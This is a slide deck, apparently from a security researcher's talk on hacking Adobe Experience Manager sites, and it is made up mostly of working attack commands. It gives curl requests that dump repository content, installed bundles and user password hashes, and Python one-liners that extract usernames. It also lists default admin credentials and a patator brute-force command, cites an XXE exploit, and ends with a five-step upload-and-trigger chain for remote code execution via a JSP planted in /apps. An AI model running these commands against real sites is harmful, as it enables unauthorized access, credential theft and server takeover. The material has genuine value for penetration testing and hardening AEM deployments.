The document summarizes techniques for hacking into Adobe Experience Manager sites. It provides commands to retrieve sensitive information like usernames, password hashes, and installed bundles. It also demonstrates how to achieve remote code execution on the system by uploading a script, copying it to the apps folder to load it, and then triggering it by accessing a specific URL. The document aims to reveal vulnerabilities that could provide unauthorized access or allow attackers to execute arbitrary code on the targeted system.

1. Hack1ng
Adobe Experience
Manager sites

2. • Mikhail Egorov
• Security researcher
• Works in Odin (Parallels)
• 0ang3el (at) gma1l (d0t) com
Who is that guy?

3. • http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/
• http://www.slideshare.net/CQCON/prsentation-ben-zahler
• https://docs.adobe.com/docs/en/aem/6-0/administer/security/security-
checklist.html
Related Work

4. • Sensitive information from JCR
• Installed OSGI bundles
• Custom scripts
• Usernames
• Password hashes
• Elements that allow anonymous modification
What do we want

5. • Use JsonRendererServlet
Sensitive information from JCR
curl -X “GET” http://127.0.0.1:8080/.json
curl -X “GET” http://127.0.0.1:8080/.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.6.json
curl -X “GET” http://127.0.0.1:8080/.tidy.infinity.json

6. • List of all bundles
• QueryBuilder is your friend!
http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html
Installed OSGI bundles
curl -X “GET” http://127.0.0.1:8080/bin.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json

7. • List customs scripts
• List compiled custom scripts from cache
Custom scripts
curl -X “GET” http://127.0.0.1:8080/apps.tidy.infinity.json
curl -X “GET” http://127.0.0.1:8080/var/classes.tidy.infinity.json

8. • Dump content node properties
• Use regular expression to extract usernames (pipe with prev command)
Usernames
curl -X “GET” http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; print "n".join([m.group(1) for m in
re.finditer("".+?By":"(.+?)"",sys.stdin.readlines()[0])])' |
sort –u

9. • Use QueryBuilder bundle
Password hashes
curl -X “GET”
http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel
ective&p.properties=rep:principalName%20rep:password&p.limit=100

10. • Dump content node properties
• Use regular expression to check (pipe with prev command)
Anonymous modification
curl -X “GET” http://127.0.0.1:8080/content.infinity.json
python -c 'import sys,re; m =
re.search("".+?By":"anonymous"",sys.stdin.readlines()[0]); print
"Anon modification: ","Yes" if m else "No"'

11. • Try default user credentials: admin/admin, author/author,
anonymous/anonymous
• Offline attack (brute hashes)
• Online attack (POST servlet bundle)
Getting access
patator http_fuzz url=http://127.0.0.1:8080/content/fake.json
method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt
auth_type=basic -x ignore:code!=200 --threads 5

12. • XSS
• CSRF
• DoS
• Read local files
• RCE
You have access, now what?
Not covered, sorry!

13. • CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 )
• Webdav OSGI bundle uses XML parser that is not properly initialized
• Exploit - https://www.exploit-db.com/exploits/37110/
Webdav bundle, XXE

14. • Out-of-bound exploitation
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
• Pros: works with anonymous credentials
• Cons: you need external server, instable
• Inbound exploitation
• Pros: you do not need external server, more stable
• Cons: you need credentials of the user that is able to modify some node in JCR
Webdav bundle, XXE

15. http://www.youtube.com/watch?v=Hg3AXoG89Gs
Webdav bundle, XXE Demo

16. • We have node – http://127.0.0.1:8080/rce
• We have script exec.jsp that is magically loaded into node –
http://127.0.0.1:8080/apps/rcetype
• When someone navigates to http://127.0.0.1:8080/rce.exec our
exec.jsp will be executed.
Remote code execution
{"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38
GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea
ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}}
{"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}

17. • Step I: Create rcetype node
Remote code execution
curl –u admin:admin –Fjcr:primaryType=nt:folder
http://127.0.0.1:8080/content/rcetype

18. • Step II: Upload script exec.jsp to rcetype node
Remote code execution
curl –u admin:admin –Fexec.jsp=@RCE.jsp
http://127.0.0.1:8080/content/rcetype

19. • Step III: Copy rcetype to /apps
Remote code execution
curl –u admin:admin –F:operation=copy –F:dest=/apps/rcetype
http://127.0.0.1:8080/content/rcetype

20. • Step IV: Create rce node bound to rcetype
Remote code execution
curl –u admin:admin –Fsling:resourceType=rcetype
http://127.0.0.1:8080/content/rce

21. • Step V: Launch jsp script
Remote code execution
curl –X “GET” http://127.0.0.1:8080/content/rce.exec

22. http://www.youtube.com/watch?v=Z9n2T07e6Ls
Remote code execution, Demo

23. Ask a Ninja